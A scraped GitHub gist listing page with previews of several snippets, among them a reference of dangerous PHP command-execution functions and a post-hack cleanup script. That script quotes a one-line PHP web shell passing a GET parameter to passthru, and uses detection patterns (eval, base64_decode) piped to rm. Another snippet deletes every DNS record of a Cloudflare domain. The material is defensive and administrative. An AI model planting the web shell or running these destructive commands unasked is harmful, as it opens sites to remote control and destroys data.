Skip to content

Instantly share code, notes, and snippets.

Avatar

Emil Stahl emilstahl

View GitHub Profile
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active Jan 15, 2022
Dangerous PHP Functions
View phpdangerousfuncs.md

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program
@fedir
fedir / cleaning.sh
Last active Sep 23, 2021
Traces of one hack and solutions for cleaning after it
View cleaning.sh
find . -type f -iname '*.php' -exec sed -i 's/<?php if (isset(\$_GET\["_cmd"\])) die(passthru(\$_GET\["_cmd"\])); ?>//g' "{}" +;
find . -iname 'index.php' | xargs grep '\x2fhom' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '\x2fh' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep 'eval("' | grep 337 | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '\{eval(' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '$_COOKIE;' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep 'create_function'|grep base64_decode| cut -f1 -d":"| xargs rm
View cloudflare_delete.py
import requests
"""
Simple script to delete every dns entry for a cloudflare domain.
Depends on requests (pip install requests). Then fill in the
following three variables:
"""
token = 'INSERT API TOKEN'
View gist:8026117
,|
//| ,|
//,/ -~ |
// / | _-~ / ,
/'/ / / _-~ _/_-~ |
( ( / /' _ -~ _-~ ,/'
\~\/'/| __--~~__--\ _-~ _/,
,,)))))));, \/~-_ __--~~ --~~ __/~ _-~ /
__))))))))))))));,>/\ / __--~~ \-~~ _-~
-\(((((''''(((((((( >~\/ --~~ __--~' _-~ ~|
View ios-8-web-app.html
<!doctype html>
<!-- http://taylor.fausak.me/2015/01/27/ios-8-web-apps/ -->
<html>
<head>
<title>iOS 8 web app</title>
<!-- CONFIGURATION -->
@saetia
saetia / gist:1623487
Last active Jan 12, 2022
Clean Install – OS X 10.11 El Capitan
View gist:1623487

OS X Preferences


most of these require logout/restart to take effect

# Enable character repeat on keydown
defaults write -g ApplePressAndHoldEnabled -bool false

# Set a shorter Delay until key repeat
@jtai
jtai / parse-tcpdump-udp-port-53.php
Last active Jan 16, 2019
Quick and dirty script to parse output of /usr/sbin/tcpdump -vvv -s 0 -l port 53
View parse-tcpdump-udp-port-53.php
<?php
// quick and dirty argument parsing
foreach ($argv as $arg) {
if ($arg == '-f') {
define('FOLLOW', true);
}
if ($arg == '-h') {
define('HISTOGRAM', true);
}